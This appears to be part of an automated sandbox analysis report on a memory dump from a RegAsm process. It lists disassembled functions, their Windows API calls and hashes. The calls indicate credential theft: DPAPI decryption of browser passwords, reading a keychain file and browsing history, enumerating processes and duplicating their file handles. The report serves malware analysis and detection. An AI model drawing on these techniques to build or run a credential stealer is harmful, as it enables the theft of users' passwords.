                                                • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                • String ID:
                                                • API String ID: 1355100292-0
                                                • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51encryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                                • String ID:
                                                • API String ID: 1945712969-0
                                                • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: FileFind$FirstNext
                                                • String ID:
                                                • API String ID: 1690352074-0
                                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0041898C
                                                • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: InfoSystemmemset
                                                • String ID:
                                                • API String ID: 3558857096-0
                                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 138 44592d-445945 call 40b6ef 24->138 139 44594a 24->139 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 53 445c7c-445c85 38->53 54 445b38-445b96 memset * 3 38->54 41->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 42->3 66 445585-44558c call 41366b 43->66 55 44584c-445854 call 40b1ab 45->55 56 445828 45->56 154 445665-445670 call 40b1ab 50->154 155 445643-445663 call 40a9b5 call 4087b3 50->155 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 63 445d1c-445d25 53->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->69 70 445b98-445ba0 54->70 55->13 71 44582e-445847 call 40a9b5 call 4087b3 56->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 66->42 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 141 445849 71->141 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->94 146 44589f 85->146 86->53 103 44568b-4456a4 call 40a9b5 call 4087b3 87->103 106 4456ba-4456c4 88->106 165 445d67-445d6c 93->165 166 445d71-445d83 call 445093 93->166 196 445e17 94->196 197 445e1e-445e25 94->197 148 4456a9-4456b0 103->148 120 4457f9 106->120 121 4456ca-4456d3 call 413cfa call 413d4c 106->121 120->6 174 4456d8-4456f7 call 40b2cc call 413fa6 121->174 138->139 139->23 141->55 146->67 148->88 148->103 154->106 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 220 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->220 239 445e62-445e69 202->239 240 445e5b 202->240 219 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->219 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 219->76 253 445f9b 219->253 220->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->53 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->219 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                APIs
                                                • memset.MSVCRT ref: 004455C2
                                                • wcsrchr.MSVCRT ref: 004455DA
                                                • memset.MSVCRT ref: 0044570D
                                                • memset.MSVCRT ref: 00445725
                                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                • memset.MSVCRT ref: 0044573D
                                                • memset.MSVCRT ref: 00445755
                                                • memset.MSVCRT ref: 004458CB
                                                • memset.MSVCRT ref: 004458E3
                                                • memset.MSVCRT ref: 0044596E
                                                • memset.MSVCRT ref: 00445A10
                                                • memset.MSVCRT ref: 00445A28
                                                • memset.MSVCRT ref: 00445AC6
                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                • memset.MSVCRT ref: 00445B52
                                                • memset.MSVCRT ref: 00445B6A
                                                • memset.MSVCRT ref: 00445C9B
                                                • memset.MSVCRT ref: 00445CB3
                                                • _wcsicmp.MSVCRT ref: 00445D56
                                                • memset.MSVCRT ref: 00445B82
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                • memset.MSVCRT ref: 00445986
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                • API String ID: 2334598624-3798722523
                                                • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                                • String ID: $/deleteregkey$/savelangfile
                                                • API String ID: 1442760552-28296030
                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 0040B71C
                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                • wcsrchr.MSVCRT ref: 0040B738
                                                • memset.MSVCRT ref: 0040B756
                                                • memset.MSVCRT ref: 0040B7F5
                                                • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                                • memset.MSVCRT ref: 0040B851
                                                • memset.MSVCRT ref: 0040B8CA
                                                • memcmp.MSVCRT ref: 0040B9BF
                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                • memset.MSVCRT ref: 0040BB53
                                                • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                                • String ID: chp$v10
                                                • API String ID: 229402216-2783969131
                                                • Opcode ID: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                • Opcode Fuzzy Hash: 0f77db0472bd63cf26258024439ab2a975461d6804070ba6b678b1f2ee2b0392
                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 519 413e79-413eae call 413959 call 413ca4 CloseHandle 512->519 520 413e28-413e35 512->520 516 413ec8-413eda call 4099f4 513->516 517 413ebf-413ec6 free 513->517 518 413edb-413ee2 516->518 517->518 525 413ee4 518->525 526 413ee7-413efe 518->526 519->511 522 413e61-413e68 520->522 523 413e37-413e44 GetModuleHandleW 520->523 522->519 529 413e6a-413e77 QueryFullProcessImageNameW 522->529 523->522 528 413e46-413e5c 523->528 525->526 526->508 528->522 529->519
                                                APIs
                                                  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                                • memset.MSVCRT ref: 00413D7F
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                • memset.MSVCRT ref: 00413E07
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                • CloseHandle.KERNEL32(?), ref: 00413EA8
                                                • free.MSVCRT ref: 00413EC1
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                • API String ID: 3957639419-1740548384
                                                • Opcode ID: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                • Opcode Fuzzy Hash: 49940329a591e45662842b0713840e3f666fa521b7868de24c85cfebece9aff1
                                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                  • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                  • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                  • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                • String ID: bhv
                                                • API String ID: 4234240956-2689659898
                                                • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                                APIs
                                                • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                                • __set_app_type.MSVCRT ref: 00446762
                                                • __p__fmode.MSVCRT ref: 00446777
                                                • __p__commode.MSVCRT ref: 00446785
                                                • __setusermatherr.MSVCRT ref: 004467B1
                                                • _initterm.MSVCRT ref: 004467C7
                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                                • _initterm.MSVCRT ref: 004467FD
                                                • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                                • exit.MSVCRT ref: 00446897
                                                • _cexit.MSVCRT ref: 0044689D
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                • String ID:
                                                • API String ID: 2791496988-0
                                                • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                                • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                                Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • memset.MSVCRT ref: 0040C298
                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                • wcschr.MSVCRT ref: 0040C324
                                                • wcschr.MSVCRT ref: 0040C344
                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                • GetLastError.KERNEL32 ref: 0040C373
                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                • String ID: visited:
                                                • API String ID: 2470578098-1702587658
                                                • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 628 40e175-40e1a1 call 40695d call 406b90 633 40e1a7-40e1e5 memset 628->633 634 40e299-40e2a8 call 4069a3 628->634 636 40e1e8-40e1fa call 406e8f 633->636 640 40e270-40e27d call 406b53 636->640 641 40e1fc-40e219 call 40dd50 * 2 636->641 640->636 647 40e283-40e286 640->647 641->640 652 40e21b-40e21d 641->652 648 40e291-40e294 call 40aa04 647->648 649 40e288-40e290 free 647->649 648->634 649->648 652->640 653 40e21f-40e235 call 40742e 652->653 653->640 656 40e237-40e242 call 40aae3 653->656 656->640 659 40e244-40e26b _snwprintf call 40a8d0 656->659 659->640
                                                APIs
                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                • memset.MSVCRT ref: 0040E1BD
                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                • free.MSVCRT ref: 0040E28B
                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                  • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
